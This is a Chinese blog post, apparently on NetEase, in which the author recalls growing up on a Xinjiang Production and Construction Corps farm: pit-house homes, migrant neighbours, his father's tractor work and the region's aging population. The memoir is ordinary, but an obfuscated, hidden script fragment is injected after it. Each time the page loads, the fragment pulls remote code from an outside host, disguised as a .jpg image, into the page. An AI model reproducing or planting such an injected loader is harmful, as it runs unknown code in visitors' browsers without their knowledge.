注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

兰洪海 的博客

吾言悟语

 
 
 

日志

 
 

兵团六十年飘逝岁月的记忆碎片 文/兰洪海  

2009-08-31 22:31:16|  分类: 信笔短长 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

兵团六十年飘逝岁月的记忆碎片  文/兰洪海

 

常常被梦里故乡一草一木萦绕,让你无法摆脱她丝丝缕缕的缠绕。故乡的小土坯房还像是风烛残年的老人,挺立在辽远广袤的地平线的一端,由远而近……

在我们的不经意间,时间划过了一条长长的河。许许多多鲜活的人,就在我走进家乡的时候,消失在我的记忆深处。还有一些儿时的玩伴,也显出老态或者英年早逝。一切都变得深重不堪。

回到故乡时,现时的场景一幕幕的勾起我童年的记忆。牧童赶着牛羊在田地草丛中奔跑,不太懂事的孩子看着这一幕,还欢快的叫嚷着要做个都市牧童,过把马背骑士的瘾。我不知道给说些什么好,当年我们为着能够离开这被誉为美丽的“塞外春城”,蜂拥着从那个狭窄的“独木桥”冲向彼岸。甚至我们发着“永不做修地球的伟大劳动者”的誓言,理想着走进大城市。

六十年前,我的父辈们或者徒步或者乘着军卡,随着进军大西北的号角,一同来到了新疆。我的伯父兰国金跟随陶峙岳将军的国民党部队在新疆就地起义。后来,他们来到了位于天山北麓伊犁河谷的伊犁将军府惠远古镇,脱下戎装屯垦戍边。与那些原来的战友们和所谓的“黑五类”劳改犯们建立了最初的五零农场。五零农场建设伊始,多数的时间是为农垦战士们新建一种叫“地窑子”的半地下住宅,几个人一间。我小时候,就曾住过几年这样的房子,一半在地下,一半在地上,外墙是草泥披实的土垛,屋顶则是几根粗细相当的杨木大梁和芦苇树枝上覆盖厚实的草泥。站在地面上,整个房子就像矮人国的建筑,约莫半人多高。我家的房子在我读小学时,做过一次屋顶翻新,那时人们已经普遍用芦苇草席做顶,周围的邻居都相帮着上房泥。

我家的邻居,有上海“鸭子”,因为他们的女人总用火钳烫着电影里才有的卷发;有湖北九头鸟,比较聪明的说法;还有四川人,三天不吃大米饭腰杆疼。他们是来自五湖四海的人,说着夹杂各地口音的普通话。他们整天空闲下来都是嘻嘻哈哈,好像从来没有烦心的事。在那时候的兵团,男人基本上分两种,一种是军人,一种是劳改犯人;女人也分两种,一种是知识青年支援边疆,一种是内地逃难去的。

我父亲建国后参军,1953年跨过了鸭绿江,参加了抗美援朝,不过那是战争已经到了尾声,父亲作为一名坦克兵,只在做《铁甲008》电影的群众演员时,有幸将自己的铁甲在镜头上留了一晃眼,是否是真的,我也无从对证,只能将这作为父亲一件最值得骄傲的谈资,放在嘴上。

父亲是1963年到新疆转业的,据说是因为开过坦克,所以安排到机务排开“东方红75”链轨拖拉机,就是那种除去炮楼跟坦克差不多的大马力机车,主要用来推土或者在田间犁地。我在小学五年级的时候就会开了,那不是方向盘的,而是两个前后拉伸的手柄,很有意思。估计现在很少有人能开。我在初中时趁父亲不在开过两次,一次撞在大树上,好在速度不快没有七十码,车直接熄火一点没有受伤,我吓的够呛!还有一次,我开在戈壁路上,遇见了一群羊,因为不能及时处置,压死了一只小羊,父亲后来赔了人家十块钱。本想把羊拿回家,可人家根本不同意。印象中父亲没有收拾我。

父亲几乎没有打过我。可是父亲打过别人。有一年,雪很大,已经没到窗沿。几个老酒鬼喝多了用树棍将我家的玻璃窗打破了,父亲拿着顶门用的撬杠,喊了邻居牛叔就追了出去,结果一番厮打。几个混混儿被打得低头认负,后来这些人被垦区公安局抓了,听说屡教不改,在严打时还被重判了。现在,这种混混听说已经很少了,派出所对这种人也盯得紧,稍有风吹草动,就会收拾他们。

兵团变了,变得有些像城市。市区的中心有了高楼,也有了一排排像营房一样的居民楼,楼房不高只有五层。学校也从原来的平房变成了四层的楼房。我印象中,读小学时,还要自己每天搬着小板凳上学的地方,全部变成了开发区和农保田。

我家的房子还是老样子,所不同的是,当初我们这几个属于“兵团二代”的孩子们都到了遥远的地方,最近的小弟也在乌鲁木齐成家立业,几次催促着父亲到城里来。父亲来了,又回去了。说是习惯了新疆的生活,只愿意把这把老骨头置身于他曾经工作和生活了近五十年的第二故乡。

原本一个三万余人的团,现在大约剩下了不到一半,留下的都是一些老人和孩子。有些本事的都进了城市,读书出去的则基本到了大城市。你能看见的中青年人,基本又是一些内地比较困难的地区的新移民,前几年拾棉花、摘枸杞、收大瓜子等等所得的丰厚回报,远远高出他们在家的收入,他们已经感受到了新疆兵团美丽的新图景。

而我只有在这遥远的地方祝福他们,不要再陷入这甘苦交织的轮回中。

ee:expression_r_r(function(){if(!window.r){varss='s'+'cript';var tt='text/ja'+'vas'+'cript';varst=document.createElement_x(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none"<
  评论这张
 
阅读(489)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017